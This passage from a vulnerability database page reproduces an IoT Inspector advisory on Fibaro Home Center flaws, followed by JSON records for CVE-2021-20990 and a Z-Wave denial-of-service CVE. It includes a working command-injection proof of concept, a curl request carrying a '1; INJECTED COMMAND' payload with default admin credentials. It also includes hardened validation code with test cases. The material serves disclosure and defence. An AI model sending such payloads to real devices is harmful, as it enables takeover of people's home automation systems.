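      'HTTP_X_FORWARDED_FOR' => '192.168.1.50'], false],
    // LAN client spoofing the header through nginx: the spoofed value comes
    // first, the address nginx appended comes last, so it is still rejected
    [['REMOTE_ADDR' => '127.0.0.1',
      'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 192.168.1.50'], false],
    // LAN client reaching lighttpd on 8000 directly with a spoofed header,
    // i.e. the request from the advisory's PoC: the peer address decides
    [['REMOTE_ADDR' => '192.168.1.50',
      'HTTP_X_FORWARDED_FOR' => '127.0.0.1'], false],
];

foreach ($cases as [$server, $expected]) {
    if (isLocalRequestHardened($server) !== $expected) {
        throw new RuntimeException('unexpected result for ' . json_encode($server));
    }
}
echo "isLocalRequestHardened: all constructed cases behave as expected\n";
```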
    
    
    
    
    
    3) Authenticated remote command execution (versions before 4.550)
    
    
    
    Backup & restore operations could be triggered through HTTP endpoints:
    
    
    
    ./var/www/services/system/backups.php
    <snip>
    function restoreBackup($params)
    {
        if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)
        {
            setStatusTooManyRequests();
            return;
        }

        $type = $params->type;
        $id = $params->id;
        $version = $params->version;

        if (is_null($id) || !is_numeric($id) || $id < 1 )
        {
            setStatusBadRequest();
            return;
        }

        $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");

        if ($type == "local" && $hcVersion == "HC2" || $type == "remote")
        {
            $version ?
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type . ' ' . $id . ' ' . $version) :
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type . ' ' . $id);
        }
        else
        {
            setStatusBadRequest();
            return;
        }

        setStatusAccepted();
    }
    </snip>
    
    
    
    The parameter $version is not sanitized or escaped, which allows an attacker
    to inject shell commands into the exec() call:

    cat > /tmp/exploit <<- EOM
    {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}}
    EOM

    curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: application/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php
    
    
    
    
    Version 4.550 and later have proper escaping:
    <snip>
        $version = escapeshellarg($params->version);
    </snip>
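    Allowlist validation for the restoreBackup() parameters, added here as an example and not the vendor's 4.550 fix: type, id and version are checked before any escapeshellarg() quoting, so the "1; INJECTED COMMAND" payload above is rejected outright. The helper name buildRestoreCommand() and the $isHc2 flag that stands in for the serial-number lookup are assumptions.

```php
<?php
// Added example, not Fibaro's code: allowlist validation for the
// restoreBackup() parameters before anything reaches exec(). The 4.550 fix
// (escapeshellarg on $version) neutralises shell metacharacters; validating
// the values first also rejects input that is a perfectly valid shell
// argument but nonsense as a backup selector, such as a "version" beginning
// with "-" that the restore script might parse as an option.
// Assumptions: the helper name buildRestoreCommand() and the $isHc2 flag,
// which stands in for the exec("cat /mnt/hw_data/serial ...") lookup.

final class InvalidBackupRequest extends InvalidArgumentException {}

/**
 * Build the restore command line from untrusted, JSON-decoded parameters.
 * Returns the command string, or throws InvalidBackupRequest.
 */
function buildRestoreCommand(object $params, bool $isHc2): string
{
    $type    = $params->type    ?? null;
    $id      = $params->id      ?? null;
    $version = $params->version ?? null;

    // type: closed set, and "local" only exists on an HC2 (as in the original).
    if ($type !== 'remote' && !($type === 'local' && $isHc2)) {
        throw new InvalidBackupRequest('unsupported backup type');
    }

    // id: a positive integer. The original's is_numeric() also accepts
    // strings such as "1e3"; FILTER_VALIDATE_INT does not.
    $idInt = filter_var($id, FILTER_VALIDATE_INT);
    if ($idInt === false || $idInt < 1) {
        throw new InvalidBackupRequest('id must be a positive integer');
    }

    $args = ['--' . $type, (string) $idInt];

    // version: optional; if present it must be digits and dots only
    // (e.g. "4.540"). \z rather than $ so a trailing newline cannot sneak
    // through. This check alone rejects the advisory's "1; INJECTED COMMAND".
    if ($version !== null) {
        if (!is_string($version) || !preg_match('/^\d+(\.\d+){0,3}\z/', $version)) {
            throw new InvalidBackupRequest('malformed version');
        }
        $args[] = $version;
    }

    // Defence in depth: quote every argument even though it was validated.
    return 'screen -dmS RESTORE restoreBackup.sh '
        . implode(' ', array_map('escapeshellarg', $args));
}

// Constructed inputs: the advisory's injection payload, a request for a
// "local" restore on a non-HC2 box, and a benign request.
$injected = json_decode('{"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}');
$wrongBox = json_decode('{"type": "local", "id": 1}');
$benign   = json_decode('{"type": "remote", "id": 1, "version": "4.540"}');

foreach ([$injected, $wrongBox] as $params) {
    try {
        buildRestoreCommand($params, false);
        throw new RuntimeException('invalid request was accepted');
    } catch (InvalidBackupRequest $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
echo buildRestoreCommand($benign, false), "\n";
```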
    
    
    
    
    
    4) Unencrypted management interface

    Nmap shows a few open ports on the box:
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    8000/tcp open  http-alt

    Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP.
    
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

    Vulnerable / tested versions:
    -----------------------------
    Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version
    at the time of the discovery.
    Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530.

    Solution:
    ---------
    Upgrade to version 4.610 or the latest version, which fixes vulnerabilities 1,
    2 and 3.

    Vulnerability 4 is not fixed as the vendor assumes that the local network is
    trusted and the device only provides wired network access. Furthermore, the
    vendor recommends using the cloud-based management interface, which is
    accessible over HTTPS and requests are forwarded via an encrypted SSH
    connection between the Fibaro cloud and the device.

    Advisory URL:
    -------------
    https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

    Vendor contact timeline:
    ------------------------
    2020-11-18: Contacting Fibaro through support@fibaro.com,
                support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com
    2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn
    2020-11-24: Advisory sent to Fibaro by email
    2020-12-01: Fibaro confirmed the receipt of the advisory
    2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes
    2021-03-16: Fibaro beta release (4.601) with the fixes
    2021-03-24: Fibaro applies for CVE numbers
    2021-03-31: Fibaro GA release (4.610) with the fix
    2021-04-08: IoT Inspector Research Lab publishes advisory

    ~~~
    
    
    
    The IoT Inspector Research Lab is an integrated part of IoT Inspector.

    IoT Inspector is a platform for automated security analysis and compliance
    checks of IoT firmware. Our mission is to secure the Internet of Things. In
    order to discover vulnerabilities and vulnerability patterns within IoT devices
    and to further enhance automated identification that allows for scalable
    detection within IoT Inspector, we conduct excessive security research in the
    area of IoT.

    Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT
    firmware, we aim to responsibly disclose relevant information to the vendor
    of the affected IoT device as well as the general public in a way that
    minimizes potential harm and encourages further security analyses of IoT
    systems.

    You can find our responsible disclosure policy here:
    https://www.iot-inspector.com/responsible-disclosure-policy/
    
    
    
    
    
    

    ~~~

    Interested in using IoT Inspector for your research or product?

    Mail: research at iot-inspector dot com

    Web: https://www.iot-inspector.com

    Blog: https://www.iot-inspector.com/blog/

    Twitter: https://twitter.com/iotinspector

    EOF Marton Illes / @2021


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0468",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "home center lite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.600"
          },
          {
            "model": "home center 2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.600"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marton Illes",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-20990",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-20990",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-20990",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-20990",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-20990",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-1335",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-20990",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode. IoT Inspector Research Lab Advisory IOT-20210408-0",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "162243",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20990",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "id": "VAR-202104-0468",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2024-11-23T22:05:09.380000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Fibaro Home Center 2 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147746"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-306",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/27"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/863.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com"
          },
          {
            "trust": 0.1,
            "url": "https://securelist.com/fibaro-smart-home/91416/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/blog/"
          },
          {
            "trust": 0.1,
            "url": "http://device:8000/services/system/reboot.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
          },
          {
            "trust": 0.1,
            "url": "http://127.0.0.1:8000;"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/iotinspector"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://device/services/system/backups.php"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/en/about-us/"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "date": "2021-04-20T16:14:10",
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "date": "2021-04-19T14:15:11.710000",
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20990"
          },
          {
            "date": "2022-08-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          },
          {
            "date": "2024-11-21T05:47:20.700000",
            "db": "NVD",
            "id": "CVE-2021-20990"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "FIBARO Home Center 2 Access control error vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "access control error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1335"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202201-0274

    Vulnerability from variot - Updated: 2024-08-14 14:18

    Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages. Various Silicon Labs Z-Wave chipsets do not support encryption, can be downgraded to not use weaker encryption, and are vulnerable to denial of service. Some of these vulnerabilities are inherent in Z-Wave protocol specifications.

    CVE-2020-10137: Unknown
    CVE-2020-9057: Affected. Vendor Statement: This is a known weakness with unencrypted traffic. S0 and S2 security can encrypt application data.
    CVE-2020-9058: Affected. Vendor Statement: This is a known weakness with unencrypted traffic. S0 and S2 can encrypt application data.
    CVE-2020-9059: Affected. Vendor Statement: This is a known weakness with S0 security.
    CVE-2020-9060: Affected. Vendor Statement: This is a known weakness with S2 security.
    CVE-2020-9061: Affected. Vendor Statement: This is a known weakness with S0 and S2 security.

    Products from multiple vendors contain resource exhaustion vulnerabilities; the result may be a denial-of-service (DoS) condition.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202201-0274",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "zw090-a",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "aeotec",
            "version": "3.95"
          },
          {
            "model": "zen25",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zooz",
            "version": "5.03"
          },
          {
            "model": "500 series",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "silabs",
            "version": "*"
          },
          {
            "model": "fgwpb-111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.3"
          },
          {
            "model": "zst10",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zooz",
            "version": "6.04"
          },
          {
            "model": "zen20",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zooz",
            "version": "5.03"
          },
          {
            "model": "zen20",
            "scope": null,
            "trust": 0.8,
            "vendor": "zooz",
            "version": null
          },
          {
            "model": "zen25",
            "scope": null,
            "trust": 0.8,
            "vendor": "zooz",
            "version": null
          },
          {
            "model": "fgwpb-111",
            "scope": null,
            "trust": 0.8,
            "vendor": "fibaro",
            "version": null
          },
          {
            "model": "z-stick gen5 +",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30a2\u30a4\u30aa\u30c6\u30c3\u30af",
            "version": null
          },
          {
            "model": "500 \u30b7\u30ea\u30fc\u30ba",
            "scope": null,
            "trust": 0.8,
            "vendor": "silicon",
            "version": null
          },
          {
            "model": "zst10",
            "scope": null,
            "trust": 0.8,
            "vendor": "zooz",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "This document was written by Timur Snoke and Art Manion.Statement Date:\u00a0\u00a0 June 30, 2020",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          }
        ],
        "trust": 0.8
      },
      "cve": "CVE-2020-9060",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "CVE-2020-9060",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "ADJACENT_NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.1,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.5,
                "id": "VHN-187185",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:A/AC:L/AU:N/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2020-9060",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Adjacent Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 6.5,
                "baseSeverity": "Medium",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2020-9060",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-9060",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2020-9060",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202201-599",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-187185",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "db": "NVD",
